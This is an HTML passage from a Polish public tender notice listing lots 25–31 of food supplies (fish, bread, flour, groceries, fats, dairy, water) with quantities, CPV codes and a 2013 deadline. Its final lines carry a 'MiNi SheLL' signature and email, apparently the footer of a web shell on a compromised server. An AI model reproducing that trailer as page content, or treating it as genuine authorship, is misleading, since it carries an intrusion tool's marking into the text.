<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	7
karp	kg	15
łosoś filet	kg	5
łosoś wędzony	kg	5
makrela wędzona	kg	5
matijas	kg	5
panga	kg	20
paprykarz 156g	szt	10
pstrąg świe.	kg	3
szprot w pomidorach	szt	10
śledź w pomidorach	szt	10
tuńczyk  w sosie wł. 250G	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26 -pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> bułka tarta	kg	30
bułki 50g	szt	500
chleb forma 0.5	szt	20
chleb krojony0,6kg	szt	500
chleb razowy 0,5	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana 1kg	szt	3
kasza jęczm. Średnia	kg	7
kasza manna	kg	3
mąka krupczatka	kg	10
mąka pszenna typu 450	kg	40
mąka pszenna typu 500	kg	40
mąka ziemiaczna	kg	20
platki kukur. 500 g	szt	10
platki kukur.kakaowe 500g	szt	10
ryż 1kg	kg	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie nr 28 -produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> barszcz czerwony 220ml-koncentrat	szt	25
bialy barszcz 60g	szt	7
budyń	szt	30
ciastka kruche	kg	6
ciastka typu wafelki	kg	5
ciastka typy pierniki	kg	5
ciastka w polewie	kg	3
cukier	kg	150
cukier puder  0,5 kg	szt	30
cukier waniliowy	szt	50
cukierki czekoladowe	kg	5
cukierki krówki	kg	3
cynamon 0,20g	szt	15
czekolada pełnomleczna	szt	10
czipsy	szt	10
galaretka owocowa	szt	60
hebata expres owocowa 25szt	szt	8
herbata 100szt  lub równoważna	szt	4
herbata expres 100 szt	szt	15
herbata expres 50 szt	szt	15
jarzynka 200g	szt	5
kakao  rozpuszczalne 500g	szt	10
kakao naturalne 200 g	szt	10
kawa naturalna mielona 500ml	szt	30
kawa rozpuszczalna 200g  lub równoważna	szt	12
kawa rozpuszczalna zboż	szt	4
keczup 500g 	szt	10
kisiel	szt	20
kminek 20g	szt	3
krem czekoladowy 200g	szt	20
krem czekoladowy 400g	szt	10
kwasek cytrynowy	szt	27
liść laurowy 12g	szt	5
lizak serduszko	szt	0
magi w plynie 1 l	szt	10
majeranek 20g	szt	12
majonez  sałatkowy 700g	szt	13
majonez sałatkowy 400g	szt	20
makaron gniazda 1kg 	szt	5
makaron muszle duże  1kg	szt	10
makaron nitki  0.5 kg	szt	13
makaron spagetti 0,5kg	szt	15
makaron świderki 1kg	szt	7
musztarda 	szt	15
paluszki solone 0,400g	szt	20
paluszki z sezamem	szt	10
papryka mielona 20g	szt	20
pasztet wielkopolski 131g lub równoważny	szt	10
pieprz mielony 20g	szt	50
pieprz ziolowy 20g	szt	3
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	5
proszek do pieczenia	szt	40
przyprawa do kurczaka 20 g	szt	20
przyprawa gyros 30	szt	7
przyprawa piernikowa	szt	10
rosół drobiowy kost.	szt	10
sos do spagetti fix	szt	30
sos słodko-kwaśny	szt	5
sól	kg	30
vegeta 200g	szt	15
wafelek b/polewy 	szt	50
wafelek grześ w polewie	opk	3
wafelek w polewie	szt	50
wiórki kokosowe 200 g	szt	50
zelatyna 50g	szt	15
ziele angielskie	szt	5
zupki chińska (ostra,łagodna rosołowa itp.)	szt	50
zurek w proszku	szt	20
żurek w butelce	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem lub równoważna 0,5 kg	szt	40
margaryna 250 g	szt	200
masło roślinne 200g	szt	10
olej 1l	szt	40
olej 3l	szt	5
smalec 200g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jogurt  150g 	szt	80
jogurt  150g naturalny	szt	40
jogurt pitny	szt	50
lody 1000g	szt	15
Lody-rolada 850g	szt	5
masło śmietank. 200G	szt	120
Mleko UHT 2% 1l	szt	10
Mleko UHT 3,2% 1l	szt	50
ser feta	szt	7
ser salami	kg	10
ser top. krążek  	szt	20
ser twarogowy 200g	szt	30
ser twarogowy półtusty	kg	30
ser wędzony	kg	5
ser żółty  edamski	kg	8
ser żółty  królewski	kg	6
ser żółty  morski	kg	10
ser żółty  szwajcar	kg	5
serek homogenizowany	szt	20
serek kanapk. Twarożk. 150g	szt	50
serek twaroż.  almette  lub równoważny	szt	30
set topiony 100g	kg	15
Śmietana 12% UHT 0,5 l.	szt	15
Śmietana 18% 0,4 zakw.	szt	25
Śmietana 30%  0,2 l	szt	30
śmietana w spray 0,5	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineral. 0,5 gaz	szt	200
woda mineral. n/g 1,5 l	szt	150
Woda mineralna 0,5 n/g	szt	200
Woda mineralna g 1,5 l 	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com